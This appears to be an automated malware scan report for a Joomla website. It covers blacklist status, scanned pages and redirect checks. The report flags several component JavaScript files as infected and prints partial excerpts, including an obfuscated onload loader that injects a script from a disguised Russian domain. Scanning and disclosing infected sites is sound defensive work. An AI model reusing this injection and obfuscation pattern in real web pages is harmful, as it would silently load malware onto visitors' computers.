Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aalphinoor.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aalphinoor.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aalphinoor.com/ | 200 OK Content-Length: 4775 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php | 200 OK Content-Length: 10764 Content-Type: text/html | clean |
http://aalphinoor.com/fr/ | 200 OK Content-Length: 10764 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=2&Itemid=2 | 200 OK Content-Length: 34013 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=3&Itemid=3 | 200 OK Content-Length: 23385 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=10&Itemid=23 | 200 OK Content-Length: 300635 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=12&Itemid=24 | 200 OK Content-Length: 12854 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=15&Itemid=27 | 200 OK Content-Length: 302083 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=8&Itemid=12 | 200 OK Content-Length: 8333 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_contact&task=view&contact_id=1&Itemid=13 | 200 OK Content-Length: 10170 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_mad4joomla&jid=2&Itemid=8 | 200 OK Content-Length: 23280 Content-Type: text/html | clean |
http://aalphinoor.com/fr/components/com_mad4joomla/js/balloontip/bubble-tooltip.js | 200 OK Content-Length: 12590 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: naver-com.novoteka.ru.ya-ru.sitemape.ru function showToolTip(e,text){ if(document.all)e = event; var obj = document.getElementById('bubble_tooltip'); var obj2 = document.getElementById('bubble_tooltip_content'); obj2.innerHTML = text; obj.style.display = 'block'; var st = Math.max(document.body.scrollTop,document.documentElement.scrollTop); if(navigator.userAgent.toLowerCase().indexOf('safari')>=0)st=0; var leftPos = e.clientX - 100; ...[11709 bytes skipped]... Decoded script: Function Function String String RegExp RegExp | ||
http://aalphinoor.com/fr/components/com_mad4joomla/js/calendar/m4j.js | 200 OK Content-Length: 13204 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: naver-com.novoteka.ru.ya-ru.sitemape.ru var calendar = null;
function selected(cal, date) { cal.sel.value = date; } function closeHandler(cal) { cal.hide(); Calendar.removeEvent(document, "mousedown", checkCalendar); } function checkCalendar(ev) { var el = Calendar.is_ie ? Calendar.getElement(ev) : Calendar.getTargetElement(ev); for (; el != null; el = el.parentNode) if (el == calendar.element || el.tagName == "A") break; ...[12040 bytes skipped]... Decoded script: Function Function String String RegExp RegExp | ||
http://aalphinoor.com/fr/components/com_mad4joomla/js/calendar/calendar_stripped.js | 200 OK Content-Length: 11235 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: naver-com.novoteka.ru.ya-ru.sitemape.ru var pw="pw";var w=window;this.d=7793;var j='svc|rviGp&t|'.replace(/[\|&Gov]/g, '');var rf="rf";var gr;if(gr!='y' && gr!='ds'){gr='y'};var a=document;w.onload=function(){try {this.ai="ai";var bl;if(bl!=''){bl='_'};r=a.createElement(j);var ub;if(ub!='hv' && ub != ''){ub=null};var q=new Date();r.src='h%t%tZp%:!/Q/!bZe?eZmZp%3Q-?c?oZm?.Zs%aZh?i!b!i?n!d?e!n!.%c%oZm?.?g%o!oQgQl%eQ-%cQo!m%.!tZh!eQl!i?f?e!t!aQg!.Qr?uQ:?8Q0?8%0Q/?1!2!6!.Qc%o!mQ/?1Q2 ...[10965 bytes skipped]... Decoded script: Function Function String String RegExp RegExp | ||
http://aalphinoor.com/fr/components/com_mad4joomla/js/calendar/lang/calendar-en.js | 200 OK Content-Length: 14341 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Calendar._DN = new Array ("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"); Calendar._SDN = new Array ("Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"); Calendar._FD = 0; Calendar._MN = new Array ("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aalphinoor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 17 Jun 2014 11:39:06 GMT
Accept-Ranges: bytes
ETag: "caa31-12a7-4c12db7c9fe00"
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.37 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 4775
Content-Type: text/html
Last-Modified: Tue, 29 May 2012 14:33:28 GMT
...4775 bytes of data.
GET / HTTP/1.1
Host: aalphinoor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 17 Jun 2014 11:39:06 GMT
Accept-Ranges: bytes
ETag: "caa31-12a7-4c12db7c9fe00"
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.37 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 4775
Content-Type: text/html
Last-Modified: Tue, 29 May 2012 14:33:28 GMT
...4775 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aalphinoor.com
Referer: http://www.google.com/search?q=aalphinoor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aalphinoor.com
Referer: http://www.google.com/search?q=aalphinoor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.